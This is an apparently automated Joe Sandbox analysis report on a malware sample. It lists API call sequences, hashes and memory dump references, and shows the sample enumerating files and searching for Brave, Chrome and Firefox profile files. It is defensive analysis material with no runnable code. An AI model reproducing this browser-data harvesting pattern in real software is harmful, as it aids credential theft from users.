                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                              • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                              • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                              • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                              APIs
                              • wsprintfA.USER32 ref: 0041492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                              • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                              • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                              • FindClose.KERNEL32(000000FF), ref: 00414B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                              • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                              • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                              • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                              APIs
                              • wsprintfA.USER32 ref: 022F3B33
                              • FindFirstFileA.KERNEL32(?,?), ref: 022F3B4A
                              • lstrcat.KERNEL32(?,?), ref: 022F3B9C
                              • StrCmpCA.SHLWAPI(?,00420F70), ref: 022F3BAE
                              • StrCmpCA.SHLWAPI(?,00420F74), ref: 022F3BC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022F3ECE
                              • FindClose.KERNEL32(000000FF), ref: 022F3EE3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID:
                              • API String ID: 1125553467-0
                              • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                              • Instruction ID: 952b6c6c87480ad450b957f1f740d4f13af54a33d405923b0fe96e5fa480afff
                              • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                              • Instruction Fuzzy Hash: F4A170B5A50218ABDB74DFE4CC84FEEB37ABF49300F444598A60D96144EB749B84CF62
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                              • HeapAlloc.KERNEL32(00000000), ref: 00414587
                              • wsprintfA.USER32 ref: 004145A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                              • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                              • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                              • FindClose.KERNEL32(000000FF), ref: 004146A0
                              • lstrcatA.KERNEL32(?,00740EC8,?,00000104), ref: 004146C5
                              • lstrcatA.KERNEL32(?,0073FEA8), ref: 004146D8
                              • lstrlenA.KERNEL32(?), ref: 004146E5
                              • lstrlenA.KERNEL32(?), ref: 004146F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 13328894-2848263008
                              • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                              • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                              • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                              • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                              APIs
                              • wsprintfA.USER32 ref: 022F4B93
                              • FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                              • StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                              • StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                              • FindClose.KERNEL32(000000FF), ref: 022F4DF9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID:
                              • API String ID: 180737720-0
                              • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                              • Instruction ID: 8a96fbd99315f11866ddfb7799df7a3b88a99b978fc153fb39681307166f6792
                              • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                              • Instruction Fuzzy Hash: BF6176B6950218ABCB24EFE0DD48FEAB3BDFB49700F404598A60D92144EB75A785CF91
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                              • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 022EC15C
                              • StrCmpCA.SHLWAPI(?,004213F8), ref: 022EC1B4
                              • StrCmpCA.SHLWAPI(?,004213FC), ref: 022EC1CA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022ECA26
                              • FindClose.KERNEL32(000000FF), ref: 022ECA38
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                              • Instruction ID: 515f4dc4328690271e4ef63c10740bfe72ce211f0698a665500e873e7073eb5a
                              • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                              • Instruction Fuzzy Hash: 17424172920304ABCF54FBE4DD95EEDB37AAF94700F404169A60E96198EF349B48CF51
                              APIs
                              • wsprintfA.USER32 ref: 00413EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                              • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                              • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                              • FindClose.KERNEL32(000000FF), ref: 00414081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                              • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                              • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                              • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022F47E7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022F47EE
                              • wsprintfA.USER32 ref: 022F480D
                              • FindFirstFileA.KERNEL32(?,?), ref: 022F4824
                              • StrCmpCA.SHLWAPI(?,00420FC4), ref: 022F4852
                              • StrCmpCA.SHLWAPI(?,00420FC8), ref: 022F4868
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022F48F2
                              • FindClose.KERNEL32(000000FF), ref: 022F4907
                              • lstrcat.KERNEL32(?,0064A524), ref: 022F492C
                              • lstrcat.KERNEL32(?,0064A22C), ref: 022F493F
                              • lstrlen.KERNEL32(?), ref: 022F494C
                              • lstrlen.KERNEL32(?), ref: 022F495D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID:
                              • API String ID: 671575355-0
                              • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                              • Instruction ID: f64c76d73fef15a40c69913949843d6cd838b9dcefb2fd7c36363173fe78561d
                              • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                              • Instruction Fuzzy Hash: D65196B9550218ABCB60EFF0DD89FEEB37DAB58700F404598E70992194DBB49B84CF91
                              APIs
                              • wsprintfA.USER32 ref: 022F412A
                              • FindFirstFileA.KERNEL32(?,?), ref: 022F4141
                              • StrCmpCA.SHLWAPI(?,00420FAC), ref: 022F416F
                              • StrCmpCA.SHLWAPI(?,00420FB0), ref: 022F4185
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022F42D3
                              • FindClose.KERNEL32(000000FF), ref: 022F42E8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID:
                              • API String ID: 180737720-0
                              • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                              • Instruction ID: f552050cb3c24e044b2156bc477af6bd32f687b64f0bc92d96c1aec3e101da15
                              • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                              • Instruction Fuzzy Hash: 1D5183B5910218BBCB24FBF0DC85EEAB37DBB48700F404598A74992044DBB5AB85CF95
                              APIs
                              • wsprintfA.USER32 ref: 0040ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                              • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                              • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                              • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                              • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                              • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                              • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                              • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: 4@$\*.*
                              • API String ID: 2325840235-1993203227
                              • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                              • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                              • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                              • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                              • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                              • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                              • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                              • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                              • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                              • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                              • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                              • FindClose.KERNEL32(000000FF), ref: 00401E32
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                              • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                              • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                              • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                              APIs
                              • wsprintfA.USER32 ref: 022EEFA5
                              • FindFirstFileA.KERNEL32(?,?), ref: 022EEFBC
                              • StrCmpCA.SHLWAPI(?,00421538), ref: 022EF012
                              • StrCmpCA.SHLWAPI(?,0042153C), ref: 022EF028
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022EF515
                              • FindClose.KERNEL32(000000FF), ref: 022EF52A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID:
                              • API String ID: 180737720-0
                              • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                              • Instruction ID: 5fc49010422755d1777c2abeaf54777e42781dc8abb2784f6c0d2cf12eb96ad2
                              • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                              • Instruction Fuzzy Hash: 61E1F0729213189ADB98FBA4DD51EEEB33AAF64300F4041E9B20E62155EF345F89CF50
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                              • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                              • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                              • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                              • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                              • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 022EDD52
                              • StrCmpCA.SHLWAPI(?,004214B4), ref: 022EDD9A
                              • StrCmpCA.SHLWAPI(?,004214B8), ref: 022EDDB0
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022EE033
                              • FindClose.KERNEL32(000000FF), ref: 022EE045
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                              • Instruction ID: 7851fd3f881908eb277134c6bd20698cd3f2e29a1a9bf94dece3e323b374f225
                              • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                              • Instruction Fuzzy Hash: DD9152729203049BCF14FBF4DD559EDB37EAB99700F408668A94E96148EF389B1C8F91
                              APIs
                              • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,0070F550,?,0042110C,?,00000000,?), ref: 0041696C
                              • sscanf.NTDLL ref: 00416999
                              • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,0070F550,?,0042110C), ref: 004169B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0070F550,?,0042110C), ref: 004169C0
                              • ExitProcess.KERNEL32 ref: 004169DA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
